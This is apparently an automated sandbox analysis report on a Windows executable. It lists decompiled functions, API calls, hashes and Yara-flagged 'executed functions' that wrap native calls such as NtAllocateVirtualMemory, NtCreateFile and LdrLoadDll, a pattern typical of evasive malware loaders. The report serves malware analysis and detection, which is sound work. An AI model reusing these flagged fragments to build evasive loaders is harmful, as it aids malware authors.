                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction ID: e13ba2afff98d71b560222bd782f45c3bf61d84a0700566cab0a4c4e6d071c33
                                              • Opcode Fuzzy Hash: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction Fuzzy Hash: FEC0021907035ED46C243AB126521BDD34018733C57D125FAAB5116513CE06083F9D3B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E002F26C4(intOrPtr _a4) {
                                              				signed int _v8;
                                              				void* _v12;
                                              				char _v16;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr* _t35;
                                              				struct HINSTANCE__* _t36;
                                              				struct HINSTANCE__* _t42;
                                              				intOrPtr* _t43;
                                              				intOrPtr* _t44;
                                              				WCHAR* _t48;
                                              				struct HINSTANCE__* _t49;
                                              				struct HINSTANCE__* _t53;
                                              				intOrPtr* _t56;
                                              				struct HINSTANCE__* _t61;
                                              				intOrPtr _t62;
                                              
                                              				if(_a4 == 2 || _a4 == 1) {
                                              					GetModuleFileNameW(0, 0x305250, 0x104);
                                              					_t48 =  *0x3054d4; // 0x12d1c30
                                              					 *0x3054d8 = 0x305250;
                                              					if(_t48 == 0 ||  *_t48 == 0) {
                                              						_t48 = 0x305250;
                                              					}
                                              					_v8 = 0;
                                              					_v16 = 0;
                                              					E002F27E3(_t48, 0, 0,  &_v8,  &_v16);
                                              					_t61 = E002F2969(_v8, _v16, 2);
                                              					if(_t61 != 0) {
                                              						E002F27E3(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                              						if(_a4 != 1) {
                                              							_v12 = 0;
                                              							_push( &_v12);
                                              							_t49 = E002F4651(_t48, 0, _t61, _t61);
                                              							if(_t49 == 0) {
                                              								_t56 = _v12;
                                              								_t53 = 0;
                                              								_t35 = _t56;
                                              								if( *_t56 == 0) {
                                              									L15:
                                              									_t36 = 0;
                                              									 *0x3054c4 = _t53;
                                              									_v12 = 0;
                                              									_t49 = 0;
                                              									 *0x3054cc = _t56;
                                              									L16:
                                              									E002F365C(_t36);
                                              									_v12 = 0;
                                              									goto L17;
                                              								} else {
                                              									goto L14;
                                              								}
                                              								do {
                                              									L14:
                                              									_t35 = _t35 + 4;
                                              									_t53 =  &(_t53->i);
                                              								} while ( *_t35 != 0);
                                              								goto L15;
                                              							}
                                              							_t36 = _v12;
                                              							goto L16;
                                              						}
                                              						 *0x3054c4 = _v8 - 1;
                                              						_t42 = _t61;
                                              						_t61 = 0;
                                              						 *0x3054cc = _t42;
                                              						goto L10;
                                              					} else {
                                              						_t43 = E002F4124();
                                              						_push(0xc);
                                              						_pop(0);
                                              						 *_t43 = 0;
                                              						L10:
                                              						_t49 = 0;
                                              						L17:
                                              						E002F365C(_t61);
                                              						return _t49;
                                              					}
                                              				} else {
                                              					_t44 = E002F4124();
                                              					_t62 = 0x16;
                                              					 *_t44 = _t62;
                                              					E002F3F2C();
                                              					return _t62;
                                              				}
                                              			}

                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\mvui1vY6Mo.exe,00000104), ref: 002F26FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FileModuleName
                                              • String ID: C:\Users\user\Desktop\mvui1vY6Mo.exe$PR0
                                              • API String ID: 514040917-4160807643
                                              • Opcode ID: b5c1af07ebf4d18a8d405641ce05d95f633d4cc8b933819ddbbb51b3e7e35847
                                              • Instruction ID: 64dfc2d2df056aa2e9013f6a3b08e8fe44f8ec193adc48bc890635fb07c945c4
                                              • Opcode Fuzzy Hash: b5c1af07ebf4d18a8d405641ce05d95f633d4cc8b933819ddbbb51b3e7e35847
                                              • Instruction Fuzzy Hash: 80316F71A1061DEBDB21EF969C858BFFBBCEB86390B104077E60897211D6B08E94CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E002F19D1(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
                                              
                                              				asm("repne jnz 0x5");
                                              				asm("repne ret");
                                              				asm("repne jmp 0x2e");
                                              				SetUnhandledExceptionFilter(0);
                                              				UnhandledExceptionFilter(_a4);
                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                              			}

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002F1A15
                                              • ___raise_securityfailure.LIBCMT ref: 002F1AFC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: pN0
                                              • API String ID: 3761405300-3818120037
                                              • Opcode ID: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction ID: 0d308b0168ceff8ee4c472d712f4ffead926be543852b325115c94fc1546d034
                                              • Opcode Fuzzy Hash: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction Fuzzy Hash: 232112F551220ADFD712DF68FA62615BBACFB48350F11412BEB088B3B0E7B45A91CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCA50(intOrPtr _a4) {
                                              				CHOOSECOLORW _v40; // decompiler emitted an anonymous struct; field order and lStructSize 0x24 match CHOOSECOLORW
                                              				intOrPtr _t23;
                                              
                                              				_v40.lStructSize = 0;
                                              				_v40.hwndOwner = 0;
                                              				_v40.hInstance = 0;
                                              				_v40.rgbResult = 0;
                                              				_v40.lpCustColors = 0;
                                              				_v40.Flags = 0;
                                              				_v40.lCustData = 0;
                                              				_v40.lpfnHook = 0;
                                              				_v40.lpTemplateName = 0;
                                              				_v40.lStructSize = 0x24;
                                              				_v40.hwndOwner = _a4;
                                              				_v40.lpCustColors = 0x305948;
                                              				_t23 =  *0x304a00; // 0xffffff
                                              				_v40.rgbResult = _t23;
                                              				_v40.Flags = 3;
                                              				ChooseColorW( &_v40);
                                              				return _v40.rgbResult;
                                              			}

                                              APIs
                                              • ChooseColorW.COMDLG32(00000024), ref: 002FCA9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ChooseColor
                                              • String ID: $$HY0
                                              • API String ID: 2281747019-3994700921
                                              • Opcode ID: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction ID: b252ff451443ef245a48edfba134aa7b02e4529d1b699c573de1526c769efafe
                                              • Opcode Fuzzy Hash: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction Fuzzy Hash: 22F017B4D052099FCB81DFA9D9496AEBBF4BB08310F20456AD908F3340E7755A44CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F540D(char _a4) {
                                              				struct HINSTANCE__** _t5;
                                              
                                              				if(_a4 == 0) {
                                              					_t5 = 0x305620;
                                              					do {
                                              						if( *_t5 != 0) {
                                              							if( *_t5 != 0xffffffff) {
                                              								FreeLibrary( *_t5);
                                              							}
                                              							 *_t5 =  *_t5 & 0x00000000;
                                              						}
                                              						_t5 =  &(_t5[1]);
                                              					} while (_t5 != 0x305670);
                                              				}
                                              				return 1;
                                              			}

                                              APIs
                                              • FreeLibrary.KERNEL32(00305620), ref: 002F542A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: V0$pV0
                                              • API String ID: 3664257935-2562600905
                                              • Opcode ID: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction ID: 55738b24e014b095ddc245c200214a5d48684adbd488d9da3631c053ac046ecb
                                              • Opcode Fuzzy Hash: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction Fuzzy Hash: 40E04F3682196E9ADB320E08E408371BAD49750376F95553AD6DC121E092751CE1DA81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              C-Code - Quality: 37%
                                              			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                              				void* _t18;
                                              				void* _t27;
                                              				intOrPtr* _t28;
                                              				intOrPtr _t13; // temporaries below were left undeclared by the decompiler
                                              				char* _t4;
                                              				char* _t6;
                                              				char* _t12;
                                              
                                              				_t13 = _a4;
                                              				_t28 = _a4 + 0xc48;
                                              				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                              				_t4 =  &_a40; // 0x413a21
                                              				_t6 =  &_a32; // 0x413d62
                                              				_t12 =  &_a8; // 0x413d62
                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                              				return _t18;
                                              			}

                                              APIs
                                              • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: !:A$b=A$b=A
                                              • API String ID: 2738559852-704622139
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                              				char* _v8;
                                              				struct _EXCEPTION_RECORD _v12;
                                              				struct _OBJDIR_INFORMATION _v16;
                                              				char _v536;
                                              				void* _t15;
                                              				struct _OBJDIR_INFORMATION _t17;
                                              				struct _OBJDIR_INFORMATION _t18;
                                              				void* _t30;
                                              				void* _t31;
                                              				void* _t32;
                                              
                                              				_v8 =  &_v536;
                                              				_t15 = E0041AB60( &_v12, 0x104, _a8);
                                              				_t31 = _t30 + 0xc;
                                              				if(_t15 != 0) {
                                              					_t17 = E0041AF80(__eflags, _v8);
                                              					_t32 = _t31 + 4;
                                              					__eflags = _t17;
                                              					if(_t17 != 0) {
                                              						E0041B200( &_v12, 0);
                                              						_t32 = _t32 + 8;
                                              					}
                                              					_t18 = E00419310(_v8);
                                              					_v16 = _t18;
                                              					__eflags = _t18;
                                              					if(_t18 == 0) {
                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                              						return _v16;
                                              					}
                                              					return _t18;
                                              				} else {
                                              					return _t15;
                                              				}
                                              			}

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                              				long _t21;
                                              				void* _t31;
                                              				intOrPtr _t3; // left undeclared by the decompiler
                                              
                                              				_t3 = _a4 + 0xc40; // 0xc40
                                              				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                              				return _t21;
                                              			}

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                              • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004183AB(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                              				long _t14;
                                              				void* _t22;
                                              				intOrPtr _t10; // temporaries below were left undeclared by the decompiler
                                              				intOrPtr _t3;
                                              
                                              				_t10 = _a4;
                                              				_t3 = _t10 + 0xc60; // 0xca0
                                              				E00418DD0(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                              				return _t14;
                                              			}

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b4e6d97a70927d1d60bab166e2990d466c4e8aa077a0043a66107b8214f3a8e6
                                              • Instruction ID: 3a7883d157d8d0faf4c3d46eeeddaa747892696c1025efc3d0660398bcdfef1f
                                              • Opcode Fuzzy Hash: b4e6d97a70927d1d60bab166e2990d466c4e8aa077a0043a66107b8214f3a8e6
                                              • Instruction Fuzzy Hash: 72F01CB5200109AFDB14DF99DC81EE777ADEF98754F118249FA0997241C631E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                              				long _t14;
                                              				void* _t21;
                                              				intOrPtr _t3; // left undeclared by the decompiler
                                              
                                              				_t3 = _a4 + 0xc60; // 0xca0
                                              				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                              				return _t14;
                                              			}


                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                              • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00418300(intOrPtr _a4, void* _a8) {
                                              				long _t8;
                                              				void* _t11;
                                              
                                              				_t5 = _a4;
                                              				_t2 = _t5 + 0x10; // 0x300
                                              				_t3 = _t5 + 0xc50; // 0x409753
                                              				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                              				_t8 = NtClose(_a8); // executed
                                              				return _t8;
                                              			}


                                              APIs
                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                              • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e49b5097e5ad962e2ccb37cd7a11106a84db660daf06c13d1fcc0c13a9bed26c
                                              • Instruction ID: aa529a304de5efea45915dff3f74c193e3c42c010c6c24d9f83afaf70620f6fe
                                              • Opcode Fuzzy Hash: e49b5097e5ad962e2ccb37cd7a11106a84db660daf06c13d1fcc0c13a9bed26c
                                              • Instruction Fuzzy Hash: 569002A134100442D10071998414F061006E7E1341F51C115E2058668DC659CD567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 41ca395f750439391be8623e41c0354288d27200f936384c1016b1a9252600c9
                                              • Instruction ID: 8e034ab1d7abc4466898f49e4442d39af7644b7ae0532c19ea4f6314dd8ec14f
                                              • Opcode Fuzzy Hash: 41ca395f750439391be8623e41c0354288d27200f936384c1016b1a9252600c9
                                              • Instruction Fuzzy Hash: 3C9002A120200003410571998414A16500BA7E0341B51C121E20086A4DC56589957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: bef2cd16f73423c823fe0b67028aeb82523c743ab7164cd85b6e65b356f531d8
                                              • Instruction ID: 8eacc946bbb62ec7da5f576c13f0c1719315c652112c0583beb929210b0d278c
                                              • Opcode Fuzzy Hash: bef2cd16f73423c823fe0b67028aeb82523c743ab7164cd85b6e65b356f531d8
                                              • Instruction Fuzzy Hash: 759002B120100402D14071998404B461006A7D0341F51C111E6058668EC6998ED976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 7cea2f4e1205d510e5fd6741f5ee9ce9e57d9832b6e566dfaef7ff07b4bfbcc7
                                              • Instruction ID: e511bd5610fd18e2da9cda754206d1d04cd9f9e7d0dfc7f24cb2fbf8aa1912a1
                                              • Opcode Fuzzy Hash: 7cea2f4e1205d510e5fd6741f5ee9ce9e57d9832b6e566dfaef7ff07b4bfbcc7
                                              • Instruction Fuzzy Hash: 42900265211000030105B59947049071047A7D5391351C121F2009664CD66189656161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c0312717e6f6fb9d1b7c5740666a85ce5b8bd5a1b926f6d722cf347997e2d7a4
                                              • Instruction ID: 3f9a65094d79671797c00552e9269afc547ca94ea83590d49ee127cd634e461d
                                              • Opcode Fuzzy Hash: c0312717e6f6fb9d1b7c5740666a85ce5b8bd5a1b926f6d722cf347997e2d7a4
                                              • Instruction Fuzzy Hash: FC90026160100502D10171998404A16100BA7D0381F91C122E2018669ECA658A96B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1947508f1b5032040be71deafd9b17fb907006a324c29f9bc9205e76de5855a1
                                              • Instruction ID: 85d22207b41630ddc3566af77209025053ada46f7e8fedd27fb9922170d95eaf
                                              • Opcode Fuzzy Hash: 1947508f1b5032040be71deafd9b17fb907006a324c29f9bc9205e76de5855a1
                                              • Instruction Fuzzy Hash: D7900261242041525545B19984049075007B7E0381791C112E2408A64CC566995AE661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a151fd499bbe13fd066f79f211004bfc0cb18b5bc6a06e441073a71f581e8ccc
                                              • Instruction ID: dc7a1fe354a36f4df1643c6ca22cbbcbfcfa29542d83aabdac3176fefd88aab5
                                              • Opcode Fuzzy Hash: a151fd499bbe13fd066f79f211004bfc0cb18b5bc6a06e441073a71f581e8ccc
                                              • Instruction Fuzzy Hash: 9C90027120100413D11171998504B07100AA7D0381F91C512E141866CDD6968A56B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c639f006d3914f94eb4cbf682430a7ce2617b8c99293534ce349003b296f701c
                                              • Instruction ID: 5c730060f7a4627c9912d9e1cb07e20efe2b2bd05dd8592b0650d9e3d6b193b0
                                              • Opcode Fuzzy Hash: c639f006d3914f94eb4cbf682430a7ce2617b8c99293534ce349003b296f701c
                                              • Instruction Fuzzy Hash: C290026921300002D18071999408A0A1006A7D1342F91D515E100966CCC955896D6361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: de0167cb829e370190a5174a0ab3762118ccc12ce3a72714f3958c27ac9858da
                                              • Instruction ID: 1704be02e4e3dcedd42d3583eb4a340a10daacd00b72e6207f93d7637bfc1f73
                                              • Opcode Fuzzy Hash: de0167cb829e370190a5174a0ab3762118ccc12ce3a72714f3958c27ac9858da
                                              • Instruction Fuzzy Hash: 6590026130100003D14071999418A065006F7E1341F51D111E1408668CD955895A6262
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d1cbb9a8b7d26ef635fe5c05bb916ff2434b752b4c6cd81a77ff6734897828e0
                                              • Instruction ID: 74148c2ef332bf8b703a2e0e022714aae06c9731ed15051c38eb9a226a209bd0
                                              • Opcode Fuzzy Hash: d1cbb9a8b7d26ef635fe5c05bb916ff2434b752b4c6cd81a77ff6734897828e0
                                              • Instruction Fuzzy Hash: B190027131114402D1107199C404B061006A7D1341F51C511E181866CDC6D589957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e00dcb4bdf2deb1dcaad6590e1057735a1898c16f6d8008bd8077f0327d9ced6
                                              • Instruction ID: 5757d0b072a2eaf576b74c786af9809ffe22e878be40d3f9cfdac65f4219f172
                                              • Opcode Fuzzy Hash: e00dcb4bdf2deb1dcaad6590e1057735a1898c16f6d8008bd8077f0327d9ced6
                                              • Instruction Fuzzy Hash: 7A90027120100402D10075D99408A461006A7E0341F51D111E6018669EC6A589957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
